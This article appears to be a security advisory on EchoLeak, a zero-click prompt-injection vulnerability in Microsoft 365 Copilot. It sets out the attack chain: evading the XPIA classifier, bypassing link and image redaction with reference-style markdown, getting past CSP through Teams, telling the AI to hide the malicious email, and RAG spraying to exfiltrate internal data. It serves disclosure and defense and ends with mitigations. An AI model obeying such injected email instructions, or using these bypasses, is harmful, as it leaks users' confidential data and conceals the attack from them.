Copilot AI: The First Zero-click Security Vulnerability

Recently, security researchers at Aim Labs announced the first zero-click security vulnerability on Copilot AI, marking a new challenging phase for global cybersecurity. Known as EchoLeak, this vulnerability directly affects the AI system integrated into Microsoft 365 Copilot, allowing hackers to exploit and extract sensitive data without any user interaction.

Vulnerability Information

Copilot AI, an artificial intelligence with the ability to summarize emails, draft documents, and analyze spreadsheets integrated into Microsoft Office, has recently become a hot topic in the security community due to the emergence of a new vulnerability. This flaw allows attackers to extract sensitive information through a sent email without any interaction from the victim.

• Vulnerability Identifier: EchoLeak - CVE-2025-32711

• CVSS Score (3.1): 9.3

• Severity Level: CRITICAL

• General Description: The vulnerability allows hackers to perform command injection in Microsoft 365 Copilot AI, leading to the leakage of sensitive information.

Attack Chain & Exploitation Method

Image 1: Attack Chain - Source: Aim Labs

Step 1: Bypass XPIA

A cross-prompt injection attack (XPIA) acts as a filtering layer implemented by Microsoft to prevent command injection attacks into prompts. However, according to research from Aim Labs, this mechanism was easily bypassed with a cleverly disguised email containing a malicious prompt injection. To evade the XPIA classifier, the email content does not mention AI, virtual assistants, Copilot, etc., ensuring that the classifier does not identify the email as malicious.

Step 2: Bypass link redaction

To extract sensitive data through M365 Copilot, the attacker needs a channel to transmit the information out. The initial idea is to embed a link leading to the attacker's server in the Copilot response content, along with parameters containing sensitive information from the LLM. However, Copilot automatically redacts markdown links pointing outside, preventing users from clicking on them.

Nevertheless, this mechanism has a flaw: reference-style markdown links are not detected and are not removed. The attacker can use alternative markdown syntax to insert malicious links that remain fully visible and functional.

By exploiting these uncontrolled markdown variations, the attacker can bypass Copilot's protection layer and establish a data leakage channel.

Figure 2: Bypassing link redaction mechanism - Source: Aim Labs

Step 3: Bypass image redaction mechanism

Instead of relying on users clicking on links, the attacker can switch to using markdown images to automatically extract data. The browser will automatically load the image when it's embedded in Copilot's response, allowing data exfiltration without user interaction.

Although Copilot also redacts regular markdown images, reference-style markdown once again becomes a vulnerability: images using this syntax are not removed. The attacker can insert a URL containing sensitive data into the image's query string, and the browser will send an HTTP request outside.

However, Microsoft's next line of defense is the Content-Security-Policy (CSP), which limits the image source (img-src) to only allowed domains, preventing the image redaction mechanism from being bypassed.

Step 4: Bypass CSP using SharePoint

The attacker attempts to exploit Microsoft SharePoint to transfer extracted data outside, but this method requires the user to accept an access invitation, which is quite inconvenient. The research team then discovered that Microsoft Teams allows data to be sent out without any user action, enabling the attack to exploit and extract sensitive data automatically.

Finally, to cover their tracks, the attacker simply instructs the AI not to mention the email containing the malicious command in any response, making it very difficult to detect the attack.

Step 5: Exploitation

The attacker can exploit through two main methods: RAG Spraying and LLM Scope Violation.

For the RAG Spraying method, the attacker's goal is to ensure their malicious email is immediately retrieved by the AI whenever the user asks any question. The attacker prepares a very long email, divided into many small parts, each resembling a normal guide document (on HR, leave policies, FAQs, etc.). Simultaneously, the attacker cleverly embeds malicious instructions for command injection. Since the email content covers various topics, the attacker can ensure the email and malicious commands are retrieved by Copilot in any situation, regardless of what the user requests.

On the other hand, with the LLM Scope Violation method, this is used after the malicious email is retrieved by Copilot. Since Copilot has access to internal documents, the attacker can easily gather sensitive data through AI-exploiting commands attached in the email.

Mitigation & Recommendations

EchoLeak is a new typical case of exploiting AI models. To avoid the risks associated with this new threat, users should:

1. Limit internal AI (Copilot) access: Grant only necessary permissions and avoid allowing AI to access all emails, documents, or sensitive data without control.

2. Improve content filtering and prevent prompt injection: Implement advanced moderation to detect malicious requests, even if they don't directly mention keywords like "AI" or "Copilot."

3. Block access to untrusted external links: Strengthen content security policies (CSP), disable hidden Markdown, or links disguised in images/guides.

4. Monitor and log all AI activities: Track user queries and AI responses to detect unusual behavior and trace when needed.

5. Train users and raise awareness: Warn about risks from strange emails, unclear AI requests, and encourage reporting any abnormalities.

References

1. Aim Labs | Echoleak Blogpost